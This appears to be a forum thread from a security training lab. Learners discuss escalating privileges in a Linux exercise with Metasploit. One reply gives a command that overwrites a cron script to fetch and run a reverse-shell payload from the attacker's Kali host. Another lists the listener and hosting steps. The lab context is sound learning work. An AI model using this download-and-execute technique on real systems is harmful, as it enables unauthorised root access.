Immerser
Immerser
Bronze IIMe again, Linux 1 to 17 were a walk in the park compared to this. For the las question all the codes work fine and I establish to get meterpreter on Metasploit but when I use the command whoami it sates Kali as opposed to root. None of the commands for this qestion use the target IP, such as msvenom, metasploit and echo. What am I doing wrong? Thanks in advance
Bronze IIhi kevin1 I didn't go the metasploit route on this one but you're going to need to change the cronjob within the initial foothold shell when you are www-data. Run the command echo “wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf” > /tmp/clear-dav.sh in the www-data meterpreter session and that will privesc the second meterpreter session to root
(hope that makes sence!)
Bronze IIHi, unfortunately I'm no further forward, Metasploit didn't accept that command. Still just getting Kali after whoami. Please can some tech wizard on here show me the light 😁?! Thanks 🤞
Bronze IIHave you created shell.elf to call back to the correct kali ip?
Are you hosting that file on a http server the whole time?
Do you have a listener open on the port you specified in msfvenom?
Bronze III'll try that later, and I'll let you know. Thanks for the update and support. I appreciate it